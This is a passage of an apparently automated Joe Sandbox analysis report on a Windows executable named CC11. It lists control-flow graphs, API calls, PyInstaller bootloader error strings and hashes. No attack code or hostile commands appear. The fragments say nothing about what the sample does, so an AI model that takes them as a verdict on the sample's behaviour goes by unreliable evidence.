7ff69003523e-7ff690035245 312->318 319 7ff690035235-7ff69003523b 312->319 317->316 327 7ff690035259 318->327 328 7ff690035247-7ff69003524f 318->328 319->318 326 7ff6900353cc-7ff6900353d1 call 7ff690029c58 320->326 345 7ff6900353f0-7ff6900353f3 321->345 346 7ff6900353f5-7ff690035407 call 7ff690029c58 321->346 326->304 337 7ff69003525b-7ff6900352cf call 7ff6900397e0 * 4 call 7ff690031e6c call 7ff690035424 * 2 327->337 328->327 334 7ff690035251-7ff690035257 328->334 334->337 337->311 345->326 346->303 359 7ff69003505c 358->359 360 7ff690035060-7ff690035064 358->360 359->360 360->358 362 7ff690035066-7ff69003508b call 7ff690025e68 360->362 368 7ff69003508e-7ff690035092 362->368 370 7ff6900350a1-7ff6900350a5 368->370 371 7ff690035094-7ff69003509f 368->371 370->368 371->370 373 7ff6900350a7-7ff6900350ab 371->373 376 7ff69003512c-7ff690035130 373->376 377 7ff6900350ad-7ff6900350d5 call 7ff690025e68 373->377 378 7ff690035137-7ff690035144 376->378 379 7ff690035132-7ff690035134 376->379 385 7ff6900350d7 377->385 386 7ff6900350f3-7ff6900350f7 377->386 381 7ff690035146-7ff69003515c call 7ff690034e2c 378->381 382 7ff69003515f-7ff69003516e call 7ff690034890 call 7ff690034880 378->382 379->378 381->382 382->253 390 7ff6900350da-7ff6900350e1 385->390 386->376 388 7ff6900350f9-7ff690035117 call 7ff690025e68 386->388 397 7ff690035123-7ff69003512a 388->397 390->386 393 7ff6900350e3-7ff6900350f1 390->393 393->386 393->390 397->376 398 7ff690035119-7ff69003511d 397->398 398->376 399 7ff69003511f 398->399 399->397
                                                                                                                                                                  APIs
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF690034F55
                                                                                                                                                                    • Part of subcall function 00007FF6900348A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348BC
                                                                                                                                                                    • Part of subcall function 00007FF690029C58: HeapFree.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
                                                                                                                                                                    • Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78
                                                                                                                                                                    • Part of subcall function 00007FF690029C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF690029BEF,?,?,?,?,?,00007FF690029ADA), ref: 00007FF690029C19
                                                                                                                                                                    • Part of subcall function 00007FF690029C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF690029BEF,?,?,?,?,?,00007FF690029ADA), ref: 00007FF690029C3E
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF690034F44
                                                                                                                                                                    • Part of subcall function 00007FF690034908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69003491C
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351BA
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351CB
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351DC
                                                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69003541C), ref: 00007FF690035203
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                  • API String ID: 4070488512-239921721
                                                                                                                                                                  • Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                                                                                  • Instruction ID: 8ee1f5a5fa18e315eaa4c09cd2f6a4207f63ac7a416a9c4f7edcc726ab730b38
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                                                                                  • Instruction Fuzzy Hash: EFD1CD26E08242A6EB35AF36D850ABD63A1EF89784F444076EA0DC7B9DDF3CE441C740

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 514 7ff690035c74-7ff690035ce7 call 7ff6900359a8 517 7ff690035ce9-7ff690035cf2 call 7ff6900243d4 514->517 518 7ff690035d01-7ff690035d0b call 7ff690027830 514->518 525 7ff690035cf5-7ff690035cfc call 7ff6900243f4 517->525 523 7ff690035d26-7ff690035d8f CreateFileW 518->523 524 7ff690035d0d-7ff690035d24 call 7ff6900243d4 call 7ff6900243f4 518->524 527 7ff690035e0c-7ff690035e17 GetFileType 523->527 528 7ff690035d91-7ff690035d97 523->528 524->525 536 7ff690036042-7ff690036062 525->536 531 7ff690035e19-7ff690035e54 GetLastError call 7ff690024368 CloseHandle 527->531 532 7ff690035e6a-7ff690035e71 527->532 534 7ff690035dd9-7ff690035e07 GetLastError call 7ff690024368 528->534 535 7ff690035d99-7ff690035d9d 528->535 531->525 548 7ff690035e5a-7ff690035e65 call 7ff6900243f4 531->548 539 7ff690035e79-7ff690035e7c 532->539 540 7ff690035e73-7ff690035e77 532->540 534->525 535->534 541 7ff690035d9f-7ff690035dd7 CreateFileW 535->541 545 7ff690035e82-7ff690035ed7 call 7ff690027748 539->545 546 7ff690035e7e 539->546 540->545 541->527 541->534 553 7ff690035ed9-7ff690035ee5 call 7ff690035bb0 545->553 554 7ff690035ef6-7ff690035f27 call 7ff690035728 545->554 546->545 548->525 553->554 559 7ff690035ee7 553->559 560 7ff690035f29-7ff690035f2b 554->560 561 7ff690035f2d-7ff690035f6f 554->561 562 7ff690035ee9-7ff690035ef1 call 7ff690029dd0 559->562 560->562 563 7ff690035f91-7ff690035f9c 561->563 564 7ff690035f71-7ff690035f75 561->564 562->536 567 7ff690036040 563->567 568 7ff690035fa2-7ff690035fa6 563->568 564->563 566 7ff690035f77-7ff690035f8c 564->566 566->563 567->536 568->567 570 7ff690035fac-7ff690035ff1 CloseHandle CreateFileW 568->570 571 7ff690036026-7ff69003603b 570->571 572 7ff690035ff3-7ff690036021 GetLastError call 7ff690024368 call 7ff690027970 570->572 571->567 572->571
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                  • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                  • Instruction ID: 508367570384a89883b3ecbd5e794a836ca73a2b604927ea56c7b07e99bd5283
                                                                                                                                                                  • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                  • Instruction Fuzzy Hash: 17C1BF36B28A4196EB25CF79C490AAD3761FB49BA8B011275DF2ED77A8CF38D151C300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 845 7ff69003518c-7ff6900351c1 call 7ff690034898 call 7ff6900348a0 call 7ff690034908 852 7ff6900351c7-7ff6900351d2 call 7ff6900348a8 845->852 853 7ff6900352ff-7ff69003536d call 7ff690029c10 call 7ff690030888 845->853 852->853 858 7ff6900351d8-7ff6900351e3 call 7ff6900348d8 852->858 865 7ff69003537b-7ff69003537e 853->865 866 7ff69003536f-7ff690035376 853->866 858->853 864 7ff6900351e9-7ff69003520c call 7ff690029c58 GetTimeZoneInformation 858->864 875 7ff6900352d4-7ff6900352fe call 7ff690034890 call 7ff690034880 call 7ff690034888 864->875 876 7ff690035212-7ff690035233 864->876 869 7ff690035380 865->869 870 7ff6900353b5-7ff6900353c8 call 7ff69002c90c 865->870 868 7ff69003540b-7ff69003540e 866->868 873 7ff690035414-7ff69003541c call 7ff690034f10 868->873 874 7ff690035383 868->874 869->874 883 7ff6900353ca 870->883 884 7ff6900353d3-7ff6900353ee call 7ff690030888 870->884 879 7ff690035388-7ff6900353b4 call 7ff690029c58 call 7ff69001b870 873->879 874->879 880 7ff690035383 call 7ff69003518c 874->880 881 7ff69003523e-7ff690035245 876->881 882 7ff690035235-7ff69003523b 876->882 880->879 889 7ff690035259 881->889 890 7ff690035247-7ff69003524f 881->890 882->881 888 7ff6900353cc-7ff6900353d1 call 7ff690029c58 883->888 904 7ff6900353f0-7ff6900353f3 884->904 905 7ff6900353f5-7ff690035407 call 7ff690029c58 884->905 888->869 897 7ff69003525b-7ff6900352cf call 7ff6900397e0 * 4 call 7ff690031e6c call 7ff690035424 * 2 889->897 890->889 895 7ff690035251-7ff690035257 890->895 895->897 897->875 904->888 905->868
                                                                                                                                                                  APIs
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351BA
                                                                                                                                                                    • Part of subcall function 00007FF690034908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69003491C
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351CB
                                                                                                                                                                    • Part of subcall function 00007FF6900348A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348BC
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351DC
                                                                                                                                                                    • Part of subcall function 00007FF6900348D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348EC
                                                                                                                                                                    • Part of subcall function 00007FF690029C58: HeapFree.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
                                                                                                                                                                    • Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78
                                                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69003541C), ref: 00007FF690035203
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                  • API String ID: 3458911817-239921721
                                                                                                                                                                  • Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                  • Instruction ID: 7d8dc545302b253465d7f88f5baa9e1cf3cbb23d1cbadd4d9b2b296aa1b6f2ab
                                                                                                                                                                  • Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F517A36E18642A6E731DF32E8909A977A0FB49784F4045B5EA0DC77AADF3CE441C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                  • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                  • Instruction ID: 5fed89063433a5787eb8b26b0daf6557e4d07e8364db9dd4f400cd070d38da90
                                                                                                                                                                  • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                  • Instruction Fuzzy Hash: 87F0C222A19682D6F7B08B70B4997667390EB8472CF440335EA6D427D8DF7CE059CB04

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 179 7ff6900118f0-7ff69001192b call 7ff690013f70 182 7ff690011bc1-7ff690011be5 call 7ff69001b870 179->182 183 7ff690011931-7ff690011971 call 7ff6900176a0 179->183 188 7ff690011977-7ff690011987 call 7ff69001f9f4 183->188 189 7ff690011bae-7ff690011bb1 call 7ff69001f36c 183->189 194 7ff690011989-7ff69001199c call 7ff690012760 188->194 195 7ff6900119a1-7ff6900119bd call 7ff69001f6bc 188->195 193 7ff690011bb6-7ff690011bbe 189->193 193->182 194->189 200 7ff6900119d7-7ff6900119ec call 7ff690024154 195->200 201 7ff6900119bf-7ff6900119d2 call 7ff690012760 195->201 206 7ff690011a06-7ff690011a87 call 7ff690011bf0 * 2 call 7ff69001f9f4 200->206 207 7ff6900119ee-7ff690011a01 call 7ff690012760 200->207 201->189 215 7ff690011a8c-7ff690011a9f call 7ff690024170 206->215 207->189 218 7ff690011ab9-7ff690011ad2 call 7ff69001f6bc 215->218 219 7ff690011aa1-7ff690011ab4 call 7ff690012760 215->219 224 7ff690011aec-7ff690011b08 call 7ff69001f430 218->224 225 7ff690011ad4-7ff690011ae7 call 7ff690012760 218->225 219->189 230 7ff690011b0a-7ff690011b16 call 7ff6900125f0 224->230 231 7ff690011b1b-7ff690011b29 224->231 225->189 230->189 231->189 233 7ff690011b2f-7ff690011b3e 231->233 235 7ff690011b40-7ff690011b46 233->235 236 7ff690011b48-7ff690011b55 235->236 237 7ff690011b60-7ff690011b6f 235->237 238 7ff690011b71-7ff690011b7a 236->238 237->237 237->238 239 7ff690011b7c-7ff690011b7f 238->239 240 7ff690011b8f 238->240 239->240 241 7ff690011b81-7ff690011b84 239->241 242 7ff690011b91-7ff690011bac 240->242 241->240 243 7ff690011b86-7ff690011b89 241->243 242->189 242->235 243->240 244 7ff690011b8b-7ff690011b8d 243->244 244->242
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _fread_nolock$Message
                                                                                                                                                                  • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                  • API String ID: 677216364-3497178890
                                                                                                                                                                  • Opcode ID: a27dc96f3f40e16025b7625df32cfd20e1a462d4ad55a2163b77310ea4cebe2b
                                                                                                                                                                  • Instruction ID: c6ec25d58129f3898a73b6695eec0cc0cbdd8efc9c084f79fb128f5bd52e115b
                                                                                                                                                                  • Opcode Fuzzy Hash: a27dc96f3f40e16025b7625df32cfd20e1a462d4ad55a2163b77310ea4cebe2b
                                                                                                                                                                  • Instruction Fuzzy Hash: 92719231A0CA86A5EBB5CB34E4906F923A5EF4878CF444075EA8DC779DEF2CE5458B00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message
                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                                                  • Opcode ID: 616ccb320428bfd7ccd31a6d912a45ac58eb3228c4087a80d9a29d8c37b4bf13
                                                                                                                                                                  • Instruction ID: 4b6a3f4181b1ff05e52e113272ff9a4d96ae6244df6e8967a3e72cd431b6587c
                                                                                                                                                                  • Opcode Fuzzy Hash: 616ccb320428bfd7ccd31a6d912a45ac58eb3228c4087a80d9a29d8c37b4bf13
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B419221B08A43A2EB759B35A4405FA63A5FF48BDCF544071EE4D87B9DEE3CE5418700

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message
                                                                                                                                                                  • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                  • API String ID: 2030045667-2813020118
                                                                                                                                                                  • Opcode ID: 0e4779326873ee70208ac24b63761cec5818e5f3cb7e6fbce8df478625f812e2
                                                                                                                                                                  • Instruction ID: b8229354cb737035eb547da92c6e0298408ba426b6b28c7a675c58376e249db5
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e4779326873ee70208ac24b63761cec5818e5f3cb7e6fbce8df478625f812e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 5651C122A08A42A1EAB59B36A4403FA6295FF8479CF444175EE5DC7BDDEF3CE542C700

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF69002E3BA,?,?,-00000018,00007FF69002A063,?,?,?,00007FF690029F5A,?,?,?,00007FF69002524E), ref: 00007FF69002E19C
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF69002E3BA,?,?,-00000018,00007FF69002A063,?,?,?,00007FF690029F5A,?,?,?,00007FF69002524E), ref: 00007FF69002E1A8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                  • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                  • Instruction ID: d0defe813a72f8529ad1aa1cff3ddcf350b369db17ed7d5ce06ddcad7963068c
                                                                                                                                                                  • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C41D131B19A42A1FA36CB3AA8006752796FF49BA0F484175EE1DC778CEE7CE4568300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 732 7ff69002ad6c-7ff69002ad92 733 7ff69002adad-7ff69002adb1 732->733 734 7ff69002ad94-7ff69002ada8 call 7ff6900243d4 call 7ff6900243f4 732->734 735 7ff69002b187-7ff69002b193 call 7ff6900243d4 call 7ff6900243f4 733->735 736 7ff69002adb7-7ff69002adbe 733->736 748 7ff69002b19e 734->748 755 7ff69002b199 call 7ff690029bf0 735->755 736->735 738 7ff69002adc4-7ff69002adf2 736->738 738->735 742 7ff69002adf8-7ff69002adff 738->742 745 7ff69002ae18-7ff69002ae1b 742->745 746 7ff69002ae01-7ff69002ae13 call 7ff6900243d4 call 7ff6900243f4 742->746 751 7ff69002ae21-7ff69002ae27 745->751 752 7ff69002b183-7ff69002b185 745->752 746->755 753 7ff69002b1a1-7ff69002b1b8 748->753 751->752 756 7ff69002ae2d-7ff69002ae30 751->756 752->753 755->748 756->746 759 7ff69002ae32-7ff69002ae57 756->759 761 7ff69002ae59-7ff69002ae5b 759->761 762 7ff69002ae8a-7ff69002ae91 759->762 763 7ff69002ae5d-7ff69002ae64 761->763 764 7ff69002ae82-7ff69002ae88 761->764 765 7ff69002ae66-7ff69002ae7d call 7ff6900243d4 call 7ff6900243f4 call 7ff690029bf0 762->765 766 7ff69002ae93-7ff69002aebb call 7ff69002c90c call 7ff690029c58 * 2 762->766 763->764 763->765 768 7ff69002af08-7ff69002af1f 764->768 796 7ff69002b010 765->796 792 7ff69002aed8-7ff69002af03 call 7ff69002b594 766->792 793 7ff69002aebd-7ff69002aed3 call 7ff6900243f4 call 7ff6900243d4 766->793 771 7ff69002af9a-7ff69002afa4 call 7ff690032c2c 768->771 772 7ff69002af21-7ff69002af29 768->772 783 7ff69002afaa-7ff69002afbf 771->783 784 7ff69002b02e 771->784 772->771 776 7ff69002af2b-7ff69002af2d 772->776 776->771 780 7ff69002af2f-7ff69002af45 776->780 780->771 785 7ff69002af47-7ff69002af53 780->785 783->784 790 7ff69002afc1-7ff69002afd3 GetConsoleMode 783->790 788 7ff69002b033-7ff69002b053 ReadFile 784->788 785->771 791 7ff69002af55-7ff69002af57 785->791 794 7ff69002b059-7ff69002b061 788->794 795 7ff69002b14d-7ff69002b156 GetLastError 788->795 790->784 797 7ff69002afd5-7ff69002afdd 790->797 791->771 798 7ff69002af59-7ff69002af71 791->798 792->768 793->796 794->795 801 7ff69002b067 794->801 804 7ff69002b158-7ff69002b16e call 7ff6900243f4 call 7ff6900243d4 795->804 805 7ff69002b173-7ff69002b176 795->805 806 7ff69002b013-7ff69002b01d call 7ff690029c58 796->806 797->788 803 7ff69002afdf-7ff69002b001 ReadConsoleW 797->803 798->771 799 7ff69002af73-7ff69002af7f 798->799 799->771 807 7ff69002af81-7ff69002af83 799->807 811 7ff69002b06e-7ff69002b083 801->811 813 7ff69002b022-7ff69002b02c 803->813 814 7ff69002b003 GetLastError 803->814 804->796 808 7ff69002b009-7ff69002b00b call 7ff690024368 805->808 809 7ff69002b17c-7ff69002b17e 805->809 806->753 807->771 818 7ff69002af85-7ff69002af95 807->818 808->796 809->806 811->806 820 7ff69002b085-7ff69002b090 811->820 813->811 814->808 818->771 824 7ff69002b0b7-7ff69002b0bf 820->824 825 7ff69002b092-7ff69002b0ab call 7ff69002a984 820->825 829 7ff69002b13b-7ff69002b148 call 7ff69002a7c4 824->829 830 7ff69002b0c1-7ff69002b0d3 824->830 832 7ff69002b0b0-7ff69002b0b2 825->832 829->832 833 7ff69002b12e-7ff69002b136 830->833 834 7ff69002b0d5 830->834 832->806 833->806 836 7ff69002b0da-7ff69002b0e1 834->836 837 7ff69002b11d-7ff69002b128 836->837 838 7ff69002b0e3-7ff69002b0e7 836->838 837->833 839 7ff69002b0e9-7ff69002b0f0 838->839 840 7ff69002b103 838->840 839->840 841 7ff69002b0f2-7ff69002b0f6 839->841 842 7ff69002b109-7ff69002b119 840->842 841->840 843 7ff69002b0f8-7ff69002b101 841->843 842->836 844 7ff69002b11b 842->844 843->842 844->833
                                                                                                                                                                  APIs
